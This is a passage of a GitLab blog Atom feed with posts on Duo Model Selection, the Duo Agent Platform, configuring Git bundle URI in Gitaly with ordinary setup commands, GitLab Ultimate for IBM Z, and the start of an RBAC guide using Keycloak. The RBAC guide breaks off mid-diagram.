<p>Meet <a href="https://docs.gitlab.com/user/gitlab_duo/model_selection/">GitLab Duo Model Selection</a>, a powerful new capability that gives teams control over the large language models (<a href="https://about.gitlab.com/blog/what-is-a-large-language-model-llm/">LLMs</a>) used in your organization. Available in private beta in the newly released <a href="https://about.gitlab.com/releases/2025/06/19/gitlab-18-1-released/">GitLab 18.1</a> to all GitLab.com customers using Duo Enterprise, Duo Model Selection makes it easier to maintain governance, compliance, and security standards while helping accelerate innovation with agentic and generative AI. With Duo Model Selection, organizations can adopt GitLab Duo faster by selecting models from their pre-approved vendor list, versus the GitLab default model.</p>
<h2>The benefits of GitLab Duo Model Selection</h2>
<p>Duo Model Selection gives GitLab.com namespace owners control over which AI models teams can use across different GitLab Duo features; organizations without specialized requirements are encouraged to stay on the GitLab default model. With Duo Model Selection, you can:</p>
<ul>
<li>
<p><strong>Configure models at the organization level:</strong> Set AI model preferences that apply across your organization’s entire namespace, ensuring consistent governance and compliance standards. Namespace owners can select models approved by their organization from GitLab's validated model catalog.</p>
</li>
<li>
<p><strong>Control models per GitLab Duo feature:</strong> Different GitLab Duo features can use different models based on your specific needs.</p>
</li>
</ul>
<p>Watch Duo Model Selection in action:</p>
<p>&lt;div style=&quot;padding:62.21% 0 0 0;position:relative;&quot;&gt;&lt;iframe src=&quot;https://player.vimeo.com/video/1094452473?autoplay=1&amp;badge=0&amp;autopause=0&amp;player_id=0&amp;app_id=58479&quot; frameborder=&quot;0&quot; allow=&quot;autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share&quot; style=&quot;position:absolute;top:0;left:0;width:100%;height:100%;&quot; title=&quot;Duo Model Selection Demo&quot;&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;script src=&quot;https://player.vimeo.com/api/player.js&quot;&gt;&lt;/script&gt;</p>
<h2>Join the Duo Model Selection private beta</h2>
<p>Ready to take control of your AI governance? Duo Model Selection is currently in private beta for all GitLab.com customers using Duo Enterprise. To join the private beta, reach out to your GitLab account team. If you don’t have Duo, <a href="https://about.gitlab.com/gitlab-duo/#free-trial">sign up for a GitLab Duo trial</a> today!</p>
<blockquote>
<p>Find out everything that's new and exciting, including agentic AI capabilities, in GitLab 18 with our <a href="https://about.gitlab.com/eighteen/">on-demand launch event</a>.</p>
</blockquote>
]]></content>
        <author>
            <name>Susie Bitters</name>
            <uri>https://about.gitlab.com/blog/authors/susie-bitters</uri>
        </author>
        <published>2025-06-25T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[GitLab Duo Agent Platform: What’s next for intelligent DevSecOps]]></title>
        <id>https://about.gitlab.com/blog/gitlab-duo-agent-platform-what-is-next-for-intelligent-devsecops/</id>
        <link href="https://about.gitlab.com/blog/gitlab-duo-agent-platform-what-is-next-for-intelligent-devsecops/"/>
        <updated>2025-06-24T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>I’m thrilled to introduce the next evolution of Duo Workflow: GitLab Duo Agent Platform. This innovative platform extends agentic capabilities across the software development lifecycle, enabling teams to work in parallel with multiple AI agents.</p>
<p>Imagine starting your day like this:</p>
<ul>
<li>You assign one AI agent to conduct deep research on an epic your team is working on, provide the latest updates on all contributions from the past week, and suggest a release post based on recent feature additions.</li>
<li>In parallel, you delegate a handful of accessibility bugs to several agents for analysis and to make the necessary code changes to resolve them.</li>
<li>Meanwhile, you ask another agent to review your complicated code changes and provide feedback before sending them to your teammate for formal review.</li>
<li>Finally, when the security team pings you about a new vulnerability that needs investigation across your entire project, you hand that research task to your security agent.</li>
</ul>
<p>All of this happens simultaneously, while you focus on architecture decisions, creative problem-solving, and strategic technical work. GitLab Duo Agent Platform will let you delegate tasks to five, 10, or even 100 specialized agents — all with full context of your project, not just your code, including CI job logs, planning work items, and so much more. You’re automating the tedious work you have to do, so you can focus on the work that inspires you.</p>
<p><strong>This isn't about replacing developers. It's about amplifying human creativity and expertise by removing the friction from routine tasks.</strong> That’s the future we’re building with GitLab Duo Agent Platform.</p>
<h2>What is GitLab Duo Agent Platform?</h2>
<p>GitLab Duo Agent Platform will enable many-to-many collaboration between engineers and <a href="https://about.gitlab.com/topics/agentic-ai/">AI agents</a> across the full software development lifecycle, designed to help teams dramatically improve productivity and cycle time.</p>
<p>Built on GitLab’s secure foundation, GitLab Duo Agent Platform is customizable and extendable. It empowers developers to build agents to tackle all kinds of software engineering problems, leveraging context across your entire software development lifecycle.</p>
<p>GitLab Duo Agent Platform will go beyond code creation with specialized agents and custom workflows that can help with a nearly unlimited list of activities, including:</p>
<ul>
<li>Issue implementation</li>
<li>Large-scale migrations/dependency upgrades</li>
<li>Automated documentation building/release posts</li>
<li>Fixing broken pipelines</li>
<li>Incident research support</li>
<li>Deep research of status and information on topics</li>
<li>Backlog administration</li>
<li>Vulnerability resolution</li>
<li>Reviews for specific types of code (e.g. database)</li>
<li>Quick internal tool building based on existing building blocks</li>
<li>and many more!</li>
</ul>
<p>You will be able to use our agents out of the box as well as customize and extend them. We’re currently beta testing GitLab Duo Agent Platform with dozens of customers and will open beta access to more teams soon.</p>
<p>Watch GitLab Duo Agent Platform in action:
&lt;div style=&quot;padding:56.25% 0 0 0;position:relative;&quot;&gt;&lt;iframe src=&quot;https://player.vimeo.com/video/1095679084?badge=0&amp;autopause=0&amp;player_id=0&amp;app_id=58479&quot; frameborder=&quot;0&quot; allow=&quot;autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share&quot; style=&quot;position:absolute;top:0;left:0;width:100%;height:100%;&quot; title=&quot;Agent Platform Demo Clip&quot;&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;script src=&quot;https://player.vimeo.com/api/player.js&quot;&gt;&lt;/script&gt;</p>
<h2>Choose your tools, your models, and your agents</h2>
<p>Consistent with GitLab’s commitment to being an open platform, GitLab agents will seamlessly interoperate with your choice of code-authoring developer tools via standard model context protocol (MCP) and the agent-to-agent (A2A) framework, whether you’re using Cursor, Claude Code, Windsurf, OpenAI Codex, or others.</p>
<p>The platform will accept code contributions from any development tool in your stack, whether that code was written by a human developer or generated by an AI agent. This means your existing workflows and preferred tools will continue to work seamlessly as you integrate agent capabilities.</p>
<p>GitLab Duo Agent Platform will work with any approved language model that <a href="https://about.gitlab.com/ai-transparency-center/#ai-continuity-plan">meets our selection criteria</a>. For organizations with strict security requirements, it will support approved self-hosted models running in completely air-gapped environments. Your infrastructure requirements and security policies won’t limit your ability to benefit from agentic development.</p>
<h2>Context is everything, and your GitLab Duo agents have it</h2>
<p>The difference between a helpful AI tool and a truly intelligent agent comes down to context. With GitLab Duo Agent Platform, agents don't work in isolation — they're deeply integrated into the platform where development work happens.</p>
<p>Every agent will automatically understand the full picture of your projects, including your open issues and their history, the merge requests that resolved them, the structure and rationale behind your code, your CI/CD pipeline configurations, security findings, compliance requirements, and the intricate relationships between all these components.</p>
<p>Just like your human team members, agents have all the context to help you ship secure software faster. Instead of just answering questions about code, they will be able to provide insights about how a proposed change might affect your deployment pipeline or suggest security improvements based on your existing compliance rules. We believe that the more your team works within GitLab’s DevSecOps platform, the smarter your agents will become.</p>
<h2>Stay in control while agents scale your team</h2>
<p>Building trust with AI agents isn't fundamentally different from building trust with new team members. You need to see their work, understand their approach, and gradually increase their responsibilities as they prove their competence.</p>
<p>That's the philosophy behind our agent approval workflow. Before any agent makes changes to your code or environment, it will present you with a clear plan: what it understands about the issue, the approach it will take, and the specific actions it wants to perform. You’ll then get the opportunity to review, approve, or redirect as needed. Over time, as agents consistently deliver quality work, you will be able to grant them greater autonomy for routine tasks while maintaining oversight for complex or critical work.</p>
<h2>Built for community and customization</h2>
<p>GitLab has always thrived on community contributions, and this year marked a milestone with record-breaking customer contributions to our platform. Now we're extending that same collaborative energy to AI agents through our open framework approach.</p>
<p>GitLab Duo Agent Platform isn't just about the agents we build — it's about empowering you and the broader community to create specialized agents that solve your unique engineering challenges. Whether you need an agent that understands your specific coding standards, integrates with your custom toolchain, or handles domain-specific tasks, the platform will give you the building blocks to make it happen.</p>
<p>This community-driven model creates a virtuous cycle that leverages the strength of the GitLab community through global sharing, similar to our <a href="https://about.gitlab.com/blog/ci-cd-catalog-goes-ga-no-more-building-pipelines-from-scratch/">CI/CD Catalog</a>. Diverse real-world use cases drive innovation. Enterprise feedback ensures reliability and security. And shared solutions benefit everyone. It's the same collaborative approach that has made GitLab successful, now applied to the frontier of agentic development.</p>
<h2>How to get started</h2>
<p>If you've been experimenting with <a href="https://about.gitlab.com/blog/2025/05/29/gitlab-duo-chat-gets-agentic-ai-makeover/">GitLab Duo Agentic Chat</a>, now included with every GitLab 18 Premium and Ultimate GitLab.com user license, you've already gotten a taste of what's possible with AI agents in your development workflow.</p>
<p>To see what GitLab Duo Agent Platform can do and what we’re working on, check out the <a href="https://about.gitlab.com/eighteen/">demos in the recording of our annual GitLab 18 release event</a>.</p>
<p>Want to be among the first to experience it? Sign up for the GitLab <a href="https://about.gitlab.com/gitlab-duo/agent-platform/">Duo Agent Platform beta waitlist</a>. This summer, we'll be opening access to more teams, with new agent features coming out in GitLab 18's upcoming releases throughout the year. We expect general availability this winter.</p>
<p><em>Disclaimer: This presentation contains information related to upcoming products, features, and functionality. It is important to note that the information in this presentation is for informational purposes only. Please do not rely on this information for purchasing or planning purposes. As with all projects, the items mentioned in this presentation and linked pages are subject to change or delay. The development, release, and timing of any products, features, or functionality remain at the sole discretion of GitLab Inc.</em></p>
<h2>Learn more</h2>
<ul>
<li><a href="https://about.gitlab.com/the-source/ai/from-vibe-coding-to-agentic-ai-a-roadmap-for-technical-leaders/">From vibe coding to agentic AI: A roadmap for technical leaders</a></li>
<li><a href="https://about.gitlab.com/topics/agentic-ai/">What is agentic AI?</a></li>
<li><a href="https://about.gitlab.com/topics/agentic-ai/devops-automation-ai-agents/">DevOps automation and AI agents</a></li>
<li><a href="https://about.gitlab.com/topics/agentic-ai/ai-augmented-software-development/">AI-augmented software development: Agentic AI for DevOps</a></li>
<li><a href="https://about.gitlab.com/topics/agentic-ai/ai-code-analysis/">AI-driven code analysis: The new frontier in code security</a></li>
</ul>
]]></content>
        <author>
            <name>Bill Staples</name>
            <uri>https://about.gitlab.com/blog/authors/bill-staples</uri>
        </author>
        <published>2025-06-24T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[Reduce the load on GitLab Gitaly with bundle URI]]></title>
        <id>https://about.gitlab.com/blog/reduce-the-load-on-gitlab-gitaly-with-bundle-uri/</id>
        <link href="https://about.gitlab.com/blog/reduce-the-load-on-gitlab-gitaly-with-bundle-uri/"/>
        <updated>2025-06-24T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>Gitaly plays a vital role in the GitLab ecosystem — it is the server
component that handles all Git operations. Every push and pull made to/from
a repository is handled by Gitaly, which has direct access to the disk where
the actual repositories are stored. As a result, when Gitaly is under heavy
load, some operations like CI/CD pipelines and browsing a repository in the
GitLab UI can become quite slow. This is particularly true when serving
clones and fetches for large and busy monorepos, which can consume large
amounts of CPU and memory.</p>
<p><a href="https://docs.gitlab.com/administration/gitaly/bundle_uris/">Bundle URI</a> takes significant load off of Gitaly servers during clones by allowing Git to pre-download a bundled repository from object storage before calling the Gitaly servers to fetch the remaining objects.</p>
<p>Here is a graph that shows the difference between clones without and with bundle URI.</p>
<p><img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1750705069/rvbm4ru1w58msd6zv4x7.png" alt="Graph that shows the difference between clones without and with bundle URI"></p>
<p>This graph shows the results of a small test we ran on an isolated GitLab installation, with Gitaly running on a machine with 2 CPUs. We wanted to test bundle URI with a large repository, so we pushed the <a href="https://gitlab.com/gitlab-org/gitlab">GitLab repository</a> to the instance. We also generated a bundle beforehand.</p>
<p>The big CPU spike is from when we performed a single clone of the GitLab repository with bundle URI disabled. It's quite noticeable. A little later, we turned on bundle URI and launched three concurrent clones of the GitLab repository. Sure enough, turning on bundle URI provides massive performance gain. We can't even distinguish the CPU usage of the three clones from normal usage.</p>
<h2>Configure Gitaly to use bundle URI</h2>
<p>To enable bundle URI on your GitLab installation, there are a couple of things you need to configure.</p>
<h3>Create a cloud bucket</h3>
<p>Bundles need to be stored somewhere. The ideal place is in a cloud storage bucket. Gitaly uses the <a href="https://pkg.go.dev/gocloud.dev">gocloud.dev</a> library to read and write from cloud storage. Any cloud storage solution supported by this library can be used. Once you have a cloud bucket URL, you can add it in the Gitaly configuration here:</p>
<pre><code class="language-toml">[bundle_uri]
go_cloud_url = &quot;&lt;bucket-uri&gt;&quot;
</code></pre>
<p>Note that Gitaly does not manage the lifecycle of the bundles stored in the bucket. To avoid unexpected storage costs, enable object lifecycle policies on the bucket so that old or unused objects are deleted.</p>
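<p>The <code>go_cloud_url</code> uses the provider-specific URL schemes defined by gocloud.dev. The bucket names below are illustrative values, not defaults:</p>
<pre><code class="language-toml">[bundle_uri]
# Google Cloud Storage:
go_cloud_url = &quot;gs://my-bundle-bucket&quot;
# Amazon S3 (region passed as a query parameter):
# go_cloud_url = &quot;s3://my-bundle-bucket?region=us-east-1&quot;
# Azure Blob Storage:
# go_cloud_url = &quot;azblob://my-bundle-container&quot;
</code></pre>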
<h3>Enable the feature flags</h3>
<p>There are two feature flags to enable:</p>
<ul>
<li>
<p><code>gitaly_bundle_generation</code> enables <a href="#auto-generated">auto-generation</a> of bundles.</p>
</li>
<li>
<p><code>gitaly_bundle_uri</code> makes Gitaly advertise bundle URIs when they are available (either manually created or auto-generated) and allows the user to <a href="#manual">manually</a> generate bundles.</p>
</li>
</ul>
<p>These feature flags can be enabled at-large on a GitLab installation, or per repository. See the <a href="https://docs.gitlab.com/administration/feature_flags/#how-to-enable-and-disable-features-behind-flags">documentation on how to enable a GitLab feature behind a feature flag</a>.</p>
<h3>How to generate bundles</h3>
<p>Gitaly offers two ways for users to use bundle URI: a <a href="#manual">manual</a> way and an <a href="#auto-generated">auto-generated</a> way.</p>
<h4>Manual</h4>
<p>It is possible to create a bundle manually by connecting over SSH with the Gitaly node that stores the repository you want to create a bundle for, and run the following command:</p>
<pre><code class="language-shell">sudo -u git -- /opt/gitlab/embedded/bin/gitaly bundle-uri \
--config=&lt;config-file&gt; \
--storage=&lt;storage-name&gt; \
--repository=&lt;relative-path&gt;
</code></pre>
<p>This command creates a bundle for the given repository and stores it in the bucket configured above. When a subsequent <code>git clone</code> request reaches Gitaly for the same repository, the bundle URI mechanism comes into play.</p>
<h4>Auto-generated</h4>
<p>Gitaly can also generate bundles automatically, using a heuristic to determine if it is currently handling frequent clones for the same repository.</p>
<p>The current heuristic keeps track of the number of times a <code>git fetch</code> request is issued for each repository. If the number of requests reaches a certain <code>threshold</code> in a given time <code>interval</code>, a bundle is automatically generated. Gitaly also keeps track of the last time it generated a bundle for a repository. When a new bundle should be regenerated, based on the <code>threshold</code> and <code>interval</code>, Gitaly looks at the last time a bundle was generated for the given repository. It will only generate a new bundle if the existing bundle is older than some <code>maxBundleAge</code> configuration. The old bundle is overwritten. There can only be one bundle per repository in cloud storage.</p>
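<p>As a toy sketch (not Gitaly's actual implementation), the regeneration decision boils down to comparing a fetch counter against <code>threshold</code> and the existing bundle's age against <code>maxBundleAge</code>:</p>
<pre><code class="language-shell"># Simplified illustration; the names mirror the configuration described
# above, but the numbers and logic are made up for demonstration.
should_generate_bundle() {
  fetches_in_interval=$1  # fetch count observed within `interval`
  threshold=$2            # minimum fetches before a bundle is considered
  bundle_age=$3           # age of the existing bundle, in seconds
  max_bundle_age=$4       # maxBundleAge, in seconds
  [ &quot;$fetches_in_interval&quot; -ge &quot;$threshold&quot; ] &amp;&amp; [ &quot;$bundle_age&quot; -gt &quot;$max_bundle_age&quot; ]
}

# 20 fetches in the interval (threshold 10), bundle is 2 days old (max age 1 day):
should_generate_bundle 20 10 172800 86400 &amp;&amp; echo &quot;regenerate bundle&quot;
</code></pre>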
<h2>Using bundle URI</h2>
<p>When a bundle exists for a repository, it can be used by the <code>git clone</code> command.</p>
<h3>Cloning from your terminal</h3>
<p>To clone a repository from your terminal, make sure your Git configuration enables bundle URI. The configuration can be set like so:</p>
<pre><code class="language-shell">git config --global transfer.bundleuri true
</code></pre>
<p>To verify that bundle URI is used during a clone, you can run the <code>git clone</code> command with <code>GIT_TRACE=1</code> and see if your bundle is being downloaded:</p>
<pre><code class="language-shell">➜  GIT_TRACE=1 git clone https://gitlab.com/gitlab-org/gitaly
...
14:31:42.374912 run-command.c:667       trace: run_command: git-remote-https '&lt;bundle-uri&gt;'
...
</code></pre>
<h3>Cloning during CI/CD pipelines</h3>
<p>One scenario where using bundle URI would be beneficial is during a CI/CD pipeline, where each job needs a copy of the repository in order to run. Cloning a repository during a CI/CD pipeline is the same as cloning a repository from your terminal, except that the Git client in this case is the GitLab Runner. Thus, we need to configure the GitLab Runner in such a way that it can use bundle URI.</p>
<p><strong>1. Update the helper-image</strong></p>
<p>The first thing to do to configure the GitLab Runner is to <a href="https://docs.gitlab.com/runner/configuration/advanced-configuration/#override-the-helper-image">overwrite the helper-image</a> that your GitLab Runner instances use. The <code>helper-image</code> is the image that is used to run the process of cloning a repository before the job starts. To use bundle URI, the image needs the following:</p>
<ul>
<li>
<p>Git Version 2.49.0 or later</p>
</li>
<li>
<p><a href="https://gitlab.com/gitlab-org/gitlab-runner/-/tree/main/apps/gitlab-runner-helper?ref_type=heads"><code>GitLab Runner helper</code></a> Version 18.1.0 or later</p>
</li>
</ul>
<p>The helper-images can be found <a href="https://gitlab.com/gitlab-org/gitlab-runner/container_registry/1472754?orderBy=PUBLISHED_AT&amp;sort=desc&amp;search%5B%5D=v18.1.0">here</a>. Select an image that corresponds to the OS distribution and the architecture you use for your GitLab Runner instances, and verify that the image satisfies the requirements.</p>
<p>At the time of writing, the <code>alpine-edge-&lt;arch&gt;-v18.1.0*</code> tag meets all requirements.</p>
<p>You can validate the image meets all requirements with:</p>
<pre><code class="language-shell">docker run -it &lt;image:tag&gt;
$ git version ## must be 2.49.0 or newer
$ gitlab-runner-helper -v ## must be 18.1.0 or newer
</code></pre>
<p>If you do not find an image that meets the requirements, you can also use the helper-image as a base image and install the requirements yourself in a custom-built image that you can host on <a href="https://docs.gitlab.com/user/packages/container_registry/">GitLab Container Registry</a>.</p>
<p>Once you have found the image you need, you must configure your GitLab Runner instances to use it by updating your <code>config.toml</code> file:</p>
<pre><code class="language-toml">[[runners]]
 (...)
 executor = &quot;docker&quot;
 [runners.docker]
    (...)
    helper_image = &quot;image:tag&quot; ## &lt;-- put the image name and tag here
</code></pre>
<p>Once the configuration is changed, you must restart the runners for the new configuration to take effect.</p>
<p><strong>2. Turn on the feature flag</strong></p>
<p>Next, you must enable the <code>FF_USE_GIT_NATIVE_CLONE</code> <a href="https://docs.gitlab.com/runner/configuration/feature-flags/">GitLab Runner feature flags</a> in your <code>.gitlab-ci.yml</code> file. To do that, simply add it as a variable and set to <code>true</code> :</p>
<pre><code class="language-yaml">variables:
  FF_USE_GIT_NATIVE_CLONE: &quot;true&quot;
</code></pre>
<p>The <code>GIT_STRATEGY</code> must also be <a href="https://docs.gitlab.com/ci/runners/configure_runners/#git-strategy">set to <code>clone</code></a>, as Git bundle URI only works with <code>clone</code> commands.</p>
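<p>Putting the two settings together, a minimal <code>.gitlab-ci.yml</code> fragment could look like this:</p>
<pre><code class="language-yaml">variables:
  FF_USE_GIT_NATIVE_CLONE: &quot;true&quot;
  GIT_STRATEGY: clone
</code></pre>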
<h2>How bundle URI works</h2>
<p>When a user clones a repository with the <code>git clone</code> command, a process called <a href="https://git-scm.com/docs/git-fetch-pack"><code>git-fetch-pack</code></a> is launched on the client's machine. This process communicates with the remote repository's server (over HTTP/S, SSH, etc.) and asks it to start a <a href="https://git-scm.com/docs/git-upload-pack"><code>git-upload-pack</code></a> process. Those two processes then exchange information using the Git protocol (note that bundle URI is only supported with <a href="https://git-scm.com/docs/protocol-v2">Git protocol v2</a>). The capabilities both processes support, and the references and objects the client needs, are among the information exchanged. Once the Git server has determined which objects to send to the client, it must package them into a packfile, which, depending on the size of the data it must process, can consume a significant amount of resources.</p>
<p>Where does bundle URI fit into this interaction? If bundle URI is advertised as a capability from the <code>upload-pack</code> process and the client supports bundle URI, the Git client will ask the server if it knows about any bundle URIs. The server sends those URIs back and the client downloads those bundles.</p>
<p>Here is a diagram that shows those interactions:</p>
<pre><code class="language-mermaid">sequenceDiagram
    participant client as Client
    participant upload as Server
    participant cloud as File server
    client -&gt;&gt; upload: issue git-upload-pack
    upload --&gt;&gt; client: list of server capabilities
    opt if bundle URI is advertised as a capability
    client -&gt;&gt; upload: request bundle URI
    upload --&gt;&gt; client: bundle URI
    client -&gt;&gt; cloud: download bundle at URI
    cloud --&gt;&gt; client: bundle file
    client -&gt;&gt; client: clone from bundle
    end
    client -&gt;&gt; upload: requests missing references and objects
    upload --&gt;&gt; client: packfile data
</code></pre>
<p>As such, Git <a href="https://git-scm.com/docs/bundle-uri">bundle URI</a> is a mechanism by which, during a <code>git clone</code>, a Git server can advertise the URI of a bundle for the repository being cloned by the Git client. When that is the case, the Git client can clone the repository from the bundle and request from the Git server only the missing references or objects that were not part of the bundle. This mechanism really helps to alleviate pressure from the Git server.</p>
<h2>Alternatives</h2>
<p>GitLab also offers the <a href="https://docs.gitlab.com/administration/gitaly/configure_gitaly/#pack-objects-cache">Pack-objects cache</a> feature, which works slightly differently from bundle URI. When the server packs objects together into a so-called packfile, this feature keeps that file in a cache. When another client requests the same set of objects, the server doesn't need to repack them; it can simply send the same packfile again.</p>
<p>The feature is only beneficial when many clients request the exact same set of objects; in a fast-changing repository, it might not bring any improvement. With bundle URI, it doesn't matter if the bundle is slightly out of date, because the client can request the missing objects after downloading the bundle and apply those changes on top. Also, bundle URI in Gitaly stores the bundles on external storage, whereas the Pack-objects cache stores them on the Gitaly node, so using the latter doesn't reduce network and I/O load on the Gitaly server.</p>
<h2>Try bundle URI today</h2>
<p>You can try the bundle URI feature in one of the following ways:</p>
<ul>
<li>
<p>Download a <a href="https://about.gitlab.com/free-trial/">free, 60-day trial version of GitLab Ultimate</a>.</p>
</li>
<li>
<p>If you already run a self-hosted GitLab installation, upgrade to 18.1.</p>
</li>
<li>
<p>If you can't upgrade to 18.1 at this time, <a href="https://about.gitlab.com/install/">download GitLab</a> to a local machine.</p>
</li>
</ul>
]]></content>
        <author>
            <name>Olivier Campeau</name>
            <uri>https://about.gitlab.com/blog/authors/olivier-campeau</uri>
        </author>
        <published>2025-06-24T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[GitLab Ultimate for IBM Z: Modern DevSecOps for mainframes]]></title>
        <id>https://about.gitlab.com/blog/gitlab-ultimate-for-ibm-z-modern-devsecops-for-mainframes/</id>
        <link href="https://about.gitlab.com/blog/gitlab-ultimate-for-ibm-z-modern-devsecops-for-mainframes/"/>
        <updated>2025-06-23T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>GitLab and IBM have partnered to solve a fundamental disconnect in enterprise development: enabling mainframe developers to work with the same modern tools, workflows, and collaboration features as their distributed counterparts. GitLab Ultimate for IBM Z, a GitLab-certified, integrated DevSecOps solution tailored for the mainframe environment, does just that — allowing organizations to modernize their mainframe development workflows by facilitating a seamless migration from outdated legacy library managers. With CI/CD pipelines running natively on IBM z/OS, customers experience accelerated innovation and reduced operational costs.</p>
<h2>Challenges of today's mainframe development</h2>
<p>Enterprise organizations that use IBM Z systems for mission-critical workloads face challenges that conventional DevSecOps tools aren’t equipped to address. Cloud-native teams benefit from modern <a href="https://about.gitlab.com/topics/ci-cd/">CI/CD</a> pipelines, collaborative development, and automated testing. In contrast, mainframe teams are often left behind — stuck with outdated tools that lead to costly inefficiencies and operational silos.</p>
<p>Teams often resort to workarounds, such as SSH connections and manual file transfers, which create security vulnerabilities and audit difficulties. When compliance requirements are stringent, these improvised solutions become unacceptable risks. Meanwhile, organizations maintain expensive parallel toolchains, with legacy mainframe development tools carrying premium licensing costs while delivering limited functionality compared to modern alternatives.</p>
<p>This fragmentation creates two problems: slower delivery cycles and difficulty attracting developers who expect modern development experiences.</p>
<blockquote>
<p><strong>&quot;GitLab Ultimate for IBM Z represents an important step in addressing a long-standing industry challenge. IDC research shows that mainframe developers often work with legacy tooling that contributes to delivery inefficiencies and makes it harder to attract new talent. With this offering, modern DevSecOps capabilities and unified workflows are brought directly to the mainframe. This empowers developers to work more collaboratively and efficiently, while helping organizations accelerate innovation and integrate mainframe development into broader digital transformation strategies.&quot;</strong> - Katie Norton, Research Manager, DevSecOps and Software Supply Chain Security at IDC</p>
</blockquote>
<h2>Unified development environments</h2>
<p>True modernization means more than just updating mainframe development. It means creating a unified platform where mainframe, cloud-native, web, and mobile development teams collaborate seamlessly.</p>
<p>GitLab Ultimate for IBM Z enables developers to use consistent workflows whether they're deploying to z/OS, cloud, or on-premises infrastructure — knowledge transfers between teams instead of staying siloed. Organizations can modernize incrementally without business disruption, as legacy systems continue operating while teams adopt modern practices at their own pace.</p>
<p>As organizations pursue hybrid cloud strategies, GitLab provides the foundation for applications that span mainframe and cloud-native environments.</p>
<h2>What is GitLab Ultimate for IBM Z?</h2>
<p>GitLab Ultimate for IBM Z delivers native z/OS Runner support, enabling seamless CI/CD pipeline execution directly on your mainframe infrastructure. This GitLab-certified solution helps eliminate the need for complex workarounds while maintaining the security and reliability your enterprise applications demand.</p>
<p>The combination of GitLab's comprehensive DevSecOps platform with IBM's deep mainframe expertise creates something unique in the market: a certified solution that provides a true bridge between enterprise legacy systems and cloud-native innovation.</p>
<h2>GitLab Ultimate for IBM Z capabilities</h2>
<p>GitLab Ultimate for IBM Z provides enterprise teams with the tools they need to modernize mainframe development while preserving critical business systems.</p>
<p><strong>Native z/OS Runner support</strong> helps eliminate security risks and scalability bottlenecks associated with remote connections, while accelerating delivery through CI/CD pipelines that execute directly where your mainframe code resides.</p>
<p><strong>Unified Source Code Management</strong> modernizes your toolchain by replacing expensive legacy library managers with GitLab's searchable, version-controlled repository system, helping reduce licensing costs and maintenance overhead.</p>
<p><strong>Seamless integration</strong> with IBM Developer for z/OS Enterprise Edition (IDzEE) delivers faster software releases through dependency-based builds, automated code scanning, and comprehensive debugging tools within familiar developer environments, enhancing both quality and security.</p>
<p><strong>End-to-end visibility</strong> across mainframe and distributed environments provides comprehensive project management from planning to production, enabling automated DevOps workflows that help retain talent through modern, next-generation development tools.</p>
<h2>Modernize your mainframe development environment today</h2>
<p>GitLab Ultimate for IBM Z is available now for organizations ready to transform their mainframe development experience. To learn more, visit the <a href="https://about.gitlab.com/partners/technology-partners/ibm/">GitLab and IBM partnership page</a>.</p>
]]></content>
        <author>
            <name>Mike Flouton</name>
            <uri>https://about.gitlab.com/blog/authors/mike-flouton</uri>
        </author>
        <author>
            <name>Andy Bradfield</name>
            <uri>https://about.gitlab.com/blog/authors/andy-bradfield</uri>
        </author>
        <published>2025-06-23T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[Automating role-based access control (RBAC) at scale]]></title>
        <id>https://about.gitlab.com/blog/automating-role-based-access-control-rbac-at-scale/</id>
        <link href="https://about.gitlab.com/blog/automating-role-based-access-control-rbac-at-scale/"/>
        <updated>2025-06-20T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>Security starts with structure. Building a scalable and secure development platform begins with getting the fundamentals right — especially role-based access control (RBAC).</p>
<p>To help our customers scale effectively, we developed the RBAC Accelerator — a modular, outcome-driven enablement program that supports large organizations in defining, enforcing, and scaling access policies across GitLab.</p>
<p>This foundation enables broader transformation. For example, the Secure SDLC Accelerator, built on top of the RBAC Accelerator, empowers customers to integrate compliance, security, and DevSecOps best practices into their workflows.</p>
<p>GitLab customer <a href="https://www.lelyna.com/us/">Lely</a>, a major Dutch manufacturer of agricultural machines and robots, used this approach to migrate to GitLab Dedicated. Lely automated user provisioning via Azure AD using OpenID Connect (OIDC), enforced <a href="https://about.gitlab.com/blog/the-ultimate-guide-to-least-privilege-access-with-gitlab/">least-privilege policies</a>, and created a scalable, reusable access model to support their future development initiatives.</p>
<p>In this guide, we’ll take you through a hands-on implementation example of GitLab + <a href="https://www.keycloak.org/">Keycloak</a> + OIDC, covering everything from running the setup in a Docker environment to automating role mapping, designing a scalable group hierarchy, and aligning GitLab access controls with organizational structure and compliance goals.</p>
<p>This is a local demo setup intended for proof-of-concept purposes only.</p>
<p>Whether you’re just starting out or optimizing at scale, this modular foundation ensures you’re not just securing access — you’re enabling everything that comes next.</p>
<h2>Getting started with access control planning</h2>
<p>Before implementing any tooling, it’s essential to understand your access landscape.</p>
<p>Consider:</p>
<ul>
<li>What GitLab resources need protection (projects, groups, environments)?</li>
<li>Who are your personas (Developers, Maintainers, Guests, etc.)?</li>
<li>What organizational units (departments, cost centers) should govern access?</li>
<li>How does your IdP structure (Keycloak) define users and roles?</li>
</ul>
<p>Use this stage to draft your:</p>
<ul>
<li>Access control matrix</li>
<li>GitLab group hierarchy (team- or product-based)</li>
<li>Least privilege policy assumptions</li>
</ul>
<p><strong>Sample group hierarchy</strong></p>
<pre><code class="language-mermaid">graph TD
    Root[&quot;Root (Root Group)&quot;]
    FirmwareTeam[&quot;Firmware-Team&quot;]
    FirmwareDevelopers[&quot;Developers (GitLab Developer Role)&quot;]
    FirmwareMaintainers[&quot;Maintainers (GitLab Maintainer Role)&quot;]
    FirmwareReporters[&quot;Reporters (GitLab Reporter Role)&quot;]
    HardwareTeam[&quot;Hardware-Team&quot;]
    HardwareDevelopers[&quot;Developers&quot;]
    SoftwareTeam[&quot;Software-Team&quot;]
    SoftwareDevelopers[&quot;Developers&quot;]
    SoftwareMaintainers[&quot;Maintainers&quot;]
    SoftwareReporters[&quot;Reporters&quot;]
    
    Root --&gt; FirmwareTeam
    Root --&gt; HardwareTeam
    Root --&gt; SoftwareTeam
    
